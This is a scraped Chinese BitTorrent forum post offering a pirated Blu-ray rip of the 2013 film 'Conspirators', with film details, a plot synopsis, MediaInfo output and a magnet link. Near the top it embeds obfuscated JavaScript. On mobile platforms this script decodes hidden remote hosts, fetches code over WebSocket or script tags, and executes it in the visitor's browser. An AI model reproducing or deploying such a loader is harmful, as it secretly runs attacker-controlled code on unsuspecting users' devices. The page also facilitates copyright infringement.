同谋[国粤语配音/中文字幕].Conspirators.2013.1080p.BluRay.x265.10bit.DTS.2Audio 5.87GB

版主小s 23天前 311

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 同谋 / A+侦探 / Conspirators

◎片 名 同謀

◎年 代 2013

◎产 地 中国香港 / 中国大陆

◎类 别 剧情 / 悬疑 / 犯罪

◎语 言 汉语普通话 / 粤语

◎上映日期 2013-04-27(中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt2927068/

◎豆瓣评分 5.0/10 (18375人评价)

◎豆瓣链接 https://movie.douban.com/subject/10617168/

◎片 长 102分钟

◎导 演 彭顺 Oxide Pang (id:1280774)

◎编 剧 彭顺 Oxide Pang (id:1280774)

吴孟璋 Mengzhang Wu (id:1327609)

彭柏成 Thomas Pang (id:1327610)

◎演 员 郭富城 Aaron Kwok (id:1041390)

张家辉 Nick Cheung (id:1037273)

江一燕 Yiyan Jiang (id:1274286)

陈观泰 Kuan Tai Chen (id:1028360)

李晨浩 Leon Lee (id:1315443)

阿牛 Ah-Niu (id:1274272)

小肥 Terence Siufay (id:1316260)

林威 Wai Lam (id:1289306)

王骏 Alvin Wong (id:1327611)

梁雅高 Yagao Liang (id:1327612)

陈浩 Hao Chen (id:1329520)

周绰华 Alvin Chow (id:1425958)

◎标 签 香港 / 悬疑 / 犯罪 / 2013 / 警匪 / 动作 / 彭氏兄弟 / 惊悚

◎简 介

三十年前双亲遭人杀害,凶手真实身份和行凶动机均是个谜,私家侦探陈强(郭富城 饰)辗转追踪到马来西亚,只为弄清父母的死因。然而与他父母曾有交往的关系人回忆所述前后矛盾,且劝阻他不要继续追查。在此期间,陈强的家也被人入室翻检。在孤立无援的情况下,他求助于当地的私家侦探郑风喜(张家辉 饰),请他协助查找关系人的背景和某些重要人物的下落。郑此刻正为弟弟的事情焦头烂额,但他耐不住陈的激将法,毅然接受委托。

但从着手调查的那一天起,各种危险便如影随形。交织着毒品与欲望的罪恶阴影,命悬一线的两位侦探逐渐向当年的真相逼近……

◎获奖情况 (共1项)

第4届豆瓣电影鑫像奖 (2014)

豆渣单元 最渣导演(华语)(提名)

└──彭顺 (id:1280774)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 150566352914134455786295632834341815371 (0x714606574A6D1528C8BDD630504AC44B)

  4. Complete name : [email protected]Q.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 5.87 GiB

  8. Duration : 1 h 42 min

  9. Overall bit rate : 8 165 kb/s

  10. Movie name : CONSPIRATORS

  11. Encoded date : UTC 2021-09-23 10:42:51

  12. Writing application : mkvmerge v61.0.0 ('So') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 42 min

  23. Bit rate : 6 165 kb/s

  24. Width : 1 916 pixels

  25. Height : 802 pixels

  26. Display aspect ratio : 2.40:1

  27. Frame rate mode : Constant

  28. Frame rate : 24.000 FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.167

  33. Stream size : 4.43 GiB (76%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=17.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1916x802 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio #1

  39. ID : 2

  40. ID in the original source medium : 4352 (0x1100)

  41. Format : DTS

  42. Format/Info : Digital Theater Systems

  43. Codec ID : A_DTS

  44. Duration : 1 h 42 min

  45. Bit rate mode : Constant

  46. Bit rate : 1 509 kb/s

  47. Channel(s) : 6 channels

  48. Channel layout : C L R Ls Rs LFE

  49. Sampling rate : 48.0 kHz

  50. Frame rate : 93.750 FPS (512 SPF)

  51. Bit depth : 16 bits

  52. Compression mode : Lossy

  53. Stream size : 1.08 GiB (18%)

  54. Title : Cantonese

  55. Language : Chinese

  56. Default : Yes

  57. Forced : No

  58. Original source medium : Blu-ray


  59. Audio #2

  60. ID : 3

  61. ID in the original source medium : 4354 (0x1102)

  62. Format : AC-3

  63. Format/Info : Audio Coding 3

  64. Commercial name : Dolby Digital

  65. Codec ID : A_AC3

  66. Duration : 1 h 42 min

  67. Bit rate mode : Constant

  68. Bit rate : 448 kb/s

  69. Channel(s) : 6 channels

  70. Channel layout : L R C LFE Ls Rs

  71. Sampling rate : 48.0 kHz

  72. Frame rate : 31.250 FPS (1536 SPF)

  73. Compression mode : Lossy

  74. Stream size : 330 MiB (5%)

  75. Title : Mandarin

  76. Language : Chinese

  77. Service kind : Complete Main

  78. Default : No

  79. Forced : No

  80. Original source medium : Blu-ray


  81. Text #1

  82. ID : 4

  83. ID in the original source medium : 4609 (0x1201)

  84. Format : PGS

  85. Muxing mode : zlib

  86. Codec ID : S_HDMV/PGS

  87. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  88. Duration : 1 h 36 min

  89. Bit rate : 37.3 kb/s

  90. Count of elements : 2077

  91. Stream size : 25.7 MiB (0%)

  92. Title : chs

  93. Language : Chinese

  94. Default : Yes

  95. Forced : No

  96. Original source medium : Blu-ray


  97. Text #2

  98. ID : 5

  99. ID in the original source medium : 4608 (0x1200)

  100. Format : PGS

  101. Muxing mode : zlib

  102. Codec ID : S_HDMV/PGS

  103. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  104. Duration : 1 h 36 min

  105. Bit rate : 38.5 kb/s

  106. Count of elements : 2077

  107. Stream size : 26.5 MiB (0%)

  108. Title : cht

  109. Language : Chinese

  110. Default : No

  111. Forced : No

  112. Original source medium : Blu-ray


  113. Text #3

  114. ID : 6

  115. ID in the original source medium : 4610 (0x1202)

  116. Format : PGS

  117. Muxing mode : zlib

  118. Codec ID : S_HDMV/PGS

  119. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  120. Duration : 1 h 36 min

  121. Bit rate : 31.7 kb/s

  122. Count of elements : 2078

  123. Stream size : 21.9 MiB (0%)

  124. Title : eng

  125. Language : English

  126. Default : No

  127. Forced : No

  128. Original source medium : Blu-ray


  129. Menu

  130. 00:00:00.000 : 第 01 章

  131. 00:07:21.416 : 第 02 章

  132. 00:15:26.625 : 第 03 章

  133. 00:24:46.791 : 第 04 章

  134. 00:34:00.625 : 第 05 章

  135. 00:42:41.125 : 第 06 章

  136. 00:53:23.833 : 第 07 章

  137. 01:00:45.208 : 第 08 章

  138. 01:12:50.458 : 第 09 章

  139. 01:17:05.833 : 第 10 章

  140. 01:24:06.833 : 第 11 章

  141. 01:34:04.750 : 第 12 章


TAGS 剧情 悬疑 犯罪

磁力链:
  • magnet:?xt=urn:btih:2DB9368114C95FFFB7088AA07EFBF8E34D503F53
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回